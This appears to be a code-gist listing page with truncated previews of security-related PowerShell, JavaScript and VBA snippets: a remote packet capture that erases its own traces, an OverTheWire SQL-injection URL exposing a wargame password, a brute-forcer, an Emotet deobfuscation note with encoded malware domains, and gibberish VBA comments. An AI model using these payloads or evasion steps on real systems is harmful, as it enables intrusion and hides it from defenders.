This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Accepts hostname or IP | |
#Runs Powershell netsh with and the ethernet types / IP addresses | |
#Stops the trace after X time | |
#Waits for the command to save the file and exit | |
#Copies file back to analyst machine | |
#removes all trace of the packet capture file | |
$IpAddress = (Get-NetIPAddress | Where-Object {($_.PrefixOrigin -eq "Dhcp") -and ($_.InterfaceAlias -eq "Local Area Connection")}).IpAddress |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh | |
#http://natas15.natas.labs.overthewire.org/index.php?&debug&username=natas16" AND password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh% | |
Function BruteForce-Password() { | |
$credentials = Get-AuthorizedCredentials | |
$bruteForceArray = Create-CharacterArray | |
$password = '' | |
$continueCracking = $true | |
while($continueCracking) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#TODO - Set the hidden attribute for the stored files | |
#TODO - Set ACL permissions for Linux / Windows for stored files | |
# Used to pad the files that store the PublicKey and EncryptedPassword Alternate Data Streams | |
$base64Goose = @" | |
JyxhZFBQWWIsZDggICxhZFBQWWJhLCAgICxhZFBQWWJhLCAgLGFkUFBZYmEsICAsYWRQUFliYSwNCmE4IiAgICBgWTg4IGE4IiAgICAgIjhhIGE4IiAgICAgI | |
jhhIEk4WyAgICAiIiBhOFBfX19fXzg4ICANCjhiICAgICAgIDg4IDhiICAgICAgIGQ4IDhiICAgICAgIGQ4ICBgIlk4YmEsICA4UFAiIiIiIiIiICANCiI4YS | |
wgICAsZDg4ICI4YSwgICAsYTgiICI4YSwgICAsYTgiIGFhICAgIF04SSAiOGIsICAgLGFhICANCiBgIlliYmRQIlk4ICBgIlliYmRQIicgICBgIlliYmRQIic | |
gIGAiWWJiZFAiJyAgYCJZYmJkOCInICANCiBhYSwgICAgLDg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgIlk4 | |
YmJkUCIgICAgICAgICAgIA0KDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXy4uLi0tLg0KICAgI |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html | |
https://gallery.technet.microsoft.com/scriptcenter/List-the-IP-addresses-in-a-60c5bb6b | |
function Get-IPrange { | |
<# | |
.SYNOPSIS | |
Get the IP addresses in a range | |
.EXAMPLE | |
Get-IPrange -start 192.168.8.2 -end 192.168.8.20 | |
.EXAMPLE |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Some work I did to deobfuscate part some emotet malware I discovered. | |
*DISCLAIMER - THIS IS ONLY FOR RESEARCH PURPOSES* | |
*/ | |
var heuc = [49,48,116,105,108,108,99,111,109,46,109,111,110,116,103,111,109,101,114,121,116,101,99,104,46,99,111,109,59,113,97,116,116,114,111,46,97,98,99,119,100,48,46,115,101,101,100,46,102,97,115,116,115,101,99,117,114,101,115,101,114,118,101,114,115,46,99,111,109,59,115,111,117,114,99,101,46,107,98,97,102,46,109,121,122,101,110,46,99,111,46,117,107,59,97,99,115,46,108,101,103,97,99,121,99,111,110,116,114,97,99,116,111,114,115,105,110,99,46,99,111,109]; | |
/* | |
https://www.branah.com/ascii-converter |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-RegexMatch { | |
param($string, $pattern) | |
return [System.Text.RegularExpressions.Regex]::Match($string, $pattern) | |
} | |
function Invoke-RegexReplace { | |
param($string, $pattern, $replacement = '') | |
return [System.Text.RegularExpressions.Regex]::Replace($string, $pattern, $replacement) | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function New-EmailTemplate { | |
param( | |
[Parameter(Mandatory=$true)] | |
[Alias('To')] | |
[String] $toField, | |
[Alias('Subject')] | |
[String] $subjectField, | |
[Parameter(Mandatory=$true)] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Resolve-DatabindObject { | |
param( | |
[parameter(Mandatory=$True)] | |
[string]$bindpath, | |
[parameter(Mandatory=$True)] | |
[object]$obj | |
) | |
#get token from path | |
if ($bindpath -match '^[^.]*') { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Function Get-PwnedAccount { | |
Param ( | |
[Parameter(Mandatory=$true)] | |
[ValidatePattern('(\w+@[]a-zA-Z_]+?\.[a-zA-Z]{2,6})')] | |
[string]$EmailAddress, | |
[Parameter(Mandatory=$false)] | |
[Boolean]$IncludeUnverified | |
) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
' Dobot, Bacefore nehate rurido muka fodotoli, Mafadego rupuro dehonafa memu babimabe hadoruh kifon cemop nasof | |
' Pano, Nototal pepi fahe dari rotab gapepace gogoril. Cuho kakigoga lemes gonal, Dedap ruset cenipi fuda cocin putecid | |
' Ponibar gepepida, Henapi doku, Fola hohelaha faduboli kemisore merolo popehuco perodo lesad leh. | |
' Medekege tefo cinol rogesa hohudin kafog mono, Raf tup cuk hofe famacu hadire lon pedefem gop fabegeho. | |
' | |
' Gerotono hemek lagec peluhimu nugubob dune bod takimonu maberogo husecuto rafabod hecer bab fus laciponom. | |
' Lekopa denefod mus, Bohu cok lilu dulemom bep legaba dabac canonagi kecicom peca pugatek pihenag ped takegi | |
' Dag nam biga peno lagiha ledaso, Negor behehof cofege daduh leki fibifig sohom deka depatepiho | |
' Rem lad heceme rufoku kah rokahe, Tole same, Behopaf roru kic fun racomaso cora lopupife mimogu kic cinicefo cen kesu | |
' Fakepi cebupopo cefo bafog koserono kor dofekef rabes cococ fanarin tapato lagotad gek fefapamu. |
OlderNewer